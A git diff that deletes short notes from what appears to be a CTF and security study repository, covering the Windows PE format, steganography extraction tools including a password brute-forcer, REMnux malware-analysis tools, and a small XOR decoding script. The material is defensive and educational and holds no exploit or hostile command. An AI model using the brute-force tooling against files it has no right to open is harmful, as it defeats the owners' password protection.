diff --git a/reverse engineering/windows/portable-executable.md b/reverse engineering/windows/portable-executable.md
deleted file mode 100644
index 7f3d3a7..0000000
--- a/reverse engineering/windows/portable-executable.md
+++ /dev/null
@@ -1,33 +0,0 @@
-# Portable Executable
-
-* [Windows PE doc](https://docs.microsoft.com/en-us/windows/win32/debug/pe-format)
-* An executable binary in the windows world
-The file format consists of
- * PE Header
- * Data Sections
-
-## Data Section
-
-The data section consists of
-* __.text__, program code
-* __.data__, initialized variables
-* __.bss__, unanitialized variables
-* __.edata__, exportable objects and related table info
-* __.idata__, imported objects and related table info
-* __.reloc__, image relocation info
-* __.rsrc__, links external resources, e.g. icons, images, manifests
-
-## Starting a PE
-
-If a process starts, the PE is read in the following order
-1. Header sections
- * File signatue is __MZ__, and magic number are read
- * Architecture of the platform
- * timestamp
-2. Section table details is parsed
-3. Content is mapped into memory based on
- * Entry point address and offset of ImageBase
- * Relative Virtual Address (RVA), addresses related to Imagebase
-4. Libraries and imports are loaded
-5. Entrypoint address of the main function is run
-
diff --git a/stego/docs/outguess.md b/stego/docs/outguess.md
deleted file mode 100644
index c056ec3..0000000
--- a/stego/docs/outguess.md
+++ /dev/null
@@ -1,2 +0,0 @@
-# Outguess
-`man outguess`
diff --git a/stego/docs/remnux.md b/stego/docs/remnux.md
deleted file mode 100644
index 454db33..0000000
--- a/stego/docs/remnux.md
+++ /dev/null
@@ -1,24 +0,0 @@
-# ReMnux
-* [Documentation](https://docs.remnux.org/)
-
-## Tools
-
-### Peepdf
-* Extracting JS from PDF using config file into `js_from_pdf.js`
-```sh
-echo 'extract js > js_from_pdf.js' > extract_js.conf
-peepdf -s extract_js.conf
-```
-
-### vmonkey
-* Detects malicious VBasic code in documents.
-```sh
-vmonkey
-```
-
-### Packaged Binaries
-* Can be identified via entropy or loaded libs
- * The count of libs loaded by a packaged bin is very low. A packaged PE could load `GetProcAddress` or `LoadLibrary`.
- * [PEiD](https://www.aldeid.com/wiki/PEiD) detects most packers.
- * File [Entropy](https://fsec404.github.io/blog/Shanon-entropy/) of a packaged is high.
-
diff --git a/stego/docs/stegbrute.md b/stego/docs/stegbrute.md
deleted file mode 100644
index 08c119e..0000000
--- a/stego/docs/stegbrute.md
+++ /dev/null
@@ -1,9 +0,0 @@
-# Stegbrute
-Bruteforce stego jpegs with a password.
-
-* install via `cargo install stegbrute`
-
-## Usage
-```sh
-stegbrute -f -w
-```
diff --git a/stego/docs/steghide.md b/stego/docs/steghide.md
deleted file mode 100644
index 91ba361..0000000
--- a/stego/docs/steghide.md
+++ /dev/null
@@ -1,8 +0,0 @@
-# Steghide
-
-* JPGs only
-
-* Example
-```sh
-steghide extract -sf jpeg1.jpeg
-```
diff --git a/stego/docs/stegoveritas.md b/stego/docs/stegoveritas.md
deleted file mode 100644
index eb09a3f..0000000
--- a/stego/docs/stegoveritas.md
+++ /dev/null
@@ -1,3 +0,0 @@
-# Stegoveritas
-
-* Install via `pip install stegoveritas` and `stegoveritas_install_deps`
diff --git a/stego/docs/zsteg.md b/stego/docs/zsteg.md
deleted file mode 100644
index 7a071b9..0000000
--- a/stego/docs/zsteg.md
+++ /dev/null
@@ -1,8 +0,0 @@
-# zsteg
-
-* PNGs, BMPs
-
-* Example
-```sh
-zsteg png1.png --strings all
-```
diff --git a/stego/stego-toolkit b/stego/stego-toolkit
deleted file mode 160000
index 4e6c2da..0000000
--- a/stego/stego-toolkit
+++ /dev/null
@@ -1 +0,0 @@
-Subproject commit 4e6c2daf5ce08dfdbb9f9711f92f686eee3a6348
diff --git a/stego/xor_key_file.py b/stego/xor_key_file.py
deleted file mode 100644
index c79d223..0000000
--- a/stego/xor_key_file.py
+++ /dev/null
@@ -1,15 +0,0 @@
-#!/usr/bin/env python
-
-def xor(data, key):
- keylen = len(key)
- return bytearray((
- (data[i] ^ key[i % keylen]) for i in range(0,len(data))
- ))
-
-
-if __name__ == "__main__":
- data = bytearray(open('topsecret.txt', 'rb').read())
- key = b'key'
- res = xor(data, key)
- print(res.decode())
-